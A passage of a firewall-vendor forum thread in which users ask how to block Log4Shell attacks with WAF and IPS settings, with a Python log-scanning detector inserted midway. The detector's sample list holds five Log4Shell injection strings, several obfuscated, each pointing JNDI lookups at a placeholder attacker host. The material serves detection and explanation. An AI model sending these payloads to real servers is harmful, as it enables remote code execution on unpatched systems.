Hi all, which category should I enable on the "Webserver Protection", "Firewall Profiles", "Common Threat Filter Categories" to block log4j related attacks?
Thanks for any help!!
I thought these were already being blocked by snort rules? According to the IPS rule sheet the snort SIDs are there. So wouldn't the rule be applied no matter which you would choose?
PFSense Plus 23.05 64-bit | Intel Xeon 4-core v3 1225 3.20Ghz
16GB Memory | 500GB SSD HDD | Fiber Conn (awaiting ATT Fiber)
(Former Sophos UTM Veteran, XG Rookie)
Hi Amodin, so, to understand this correctly: the snort rules are the default ones already integrated in the IPS filter, and regardless of which categories I choose in the WAF filter they will always be applied and cannot be disabled, is that correct?
That's how I *think* it works, but I could be wrong. If I am, I'd like to know myself. Hence, why I was sort of asking the question myself, haha.
Sophos does not use the standard Snort rules "only". Sophos builds its own snort rules.
You find all related signatures in the Advisory: https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce
__________________________________________________________________________________________________________________
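To make concrete what a request-level Log4Shell signature (whether an IPS/Snort rule or a WAF filter) has to cope with, here is an added example written for this page; it is not Sophos's signature set and not code posted in this thread. It takes a request line, undoes URL encoding, resolves the Log4j lookup tricks commonly used to hide the `${jndi:` string (nested `${lower:}`/`${upper:}` lookups and the `${name:-default}` default-value syntax), and then reports the JNDI scheme. The sample request lines are constructed for the example, and `attacker.example` is a placeholder host, not a real indicator.

```python
import re
import urllib.parse

# Constructed sample request lines for this example (not taken from the page or from
# real traffic). Index 5 is a benign request containing an unrelated ${...} string.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example/a}",
    "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1",
    "GET / HTTP/1.1 X-Api-Version: ${${lower:j}ndi:${lower:l}dap://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${env:NaN:-j}ndi:dns://attacker.example/a}",
    "GET /index.html HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; price=${amount})",
]

# An innermost Log4j lookup: ${...} whose body contains no further $, { or }.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Scheme of a resolved JNDI lookup, e.g. ldap, ldaps, rmi, dns. Matched
# case-insensitively so that ${JNDI:...} variants are not missed.
JNDI_SCHEME = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve_innermost(match):
    """Resolve one innermost lookup the way Log4j's string substitution would."""
    body = match.group(1)
    case_lookup = re.fullmatch(r"(lower|upper):(.*)", body, re.IGNORECASE)
    if case_lookup:
        value = case_lookup.group(2)
        return value.lower() if case_lookup.group(1).lower() == "lower" else value.upper()
    # ${prefix:key:-default}: an unresolvable key collapses to its default value,
    # which is how ${::-j} and ${env:NaN:-j} both become the single letter "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Anything else (including the jndi lookup itself) is left in place.
    return match.group(0)


def normalize(text, max_rounds=10):
    """URL-decode and resolve nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        resolved = INNERMOST_LOOKUP.sub(_resolve_innermost, decoded)
        if resolved == text:
            return resolved
        text = resolved
    return text


def detect_log4shell(line):
    """Return the JNDI scheme if the line carries a Log4Shell-style lookup, else None."""
    normalized = normalize(line)
    hit = JNDI_SCHEME.search(normalized)
    return hit.group(1).lower() if hit else None


def scan(lines):
    """Return [(index, scheme)] for every line that trips the detector."""
    hits = []
    for index, line in enumerate(lines):
        scheme = detect_log4shell(line)
        if scheme:
            hits.append((index, scheme))
    return hits


if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_REQUESTS):
        print(f"line {index}: jndi lookup via {scheme}")
```

The point of the normalization step is that a naive match on the literal string `${jndi:` catches only the first sample line; the other four hostile lines are exactly the obfuscated forms that make hand-written WAF patterns unreliable and are why the vendor ships dedicated signatures. A detector like this is useful for triaging web server or proxy logs behind the UTM, but it is a complement to the IPS rules, not a replacement, and neither replaces patching the vulnerable Log4j versions on the servers themselves.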
We know the product itself is not vulnerable to it, he asked what settings to enable in WAF to prevent devices behind it from being affected. Do any of the profiles work for this? None? Is my question/statement accurate?
I am assuming this is the article you mentioned: Log4Shell explained – how it works, why you need to know, and how to fix it – Naked Security (sophos.com)
Thank you for mentioning this, I had not seen it.
Maybe this is another good approach: https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/